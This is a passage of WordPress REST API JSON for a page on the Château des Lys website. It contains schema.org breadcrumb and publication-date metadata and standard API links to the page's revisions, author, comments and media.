Picardie","isPartOf":{"@id":"https:\/\/www.chateaudeslys.com\/fr\/#website"},"datePublished":"2013-01-21T18:23:51+00:00","dateModified":"2019-02-10T16:33:24+00:00","breadcrumb":{"@id":"https:\/\/www.chateaudeslys.com\/nl\/area\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.chateaudeslys.com\/nl\/area\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.chateaudeslys.com\/nl\/area\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.chateaudeslys.com\/"},{"@type":"ListItem","position":2,"name":"Omgeving"}]}]}},"_links":{"self":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/30"}],"collection":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/comments?post=30"}],"version-history":[{"count":2,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/30\/revisions"}],"predecessor-version":[{"id":2485,"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/pages\/30\/revisions\/2485"}],"wp:attachment":[{"href":"https:\/\/www.chateaudeslys.com\/fr\/wp-json\/wp\/v2\/media?parent=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}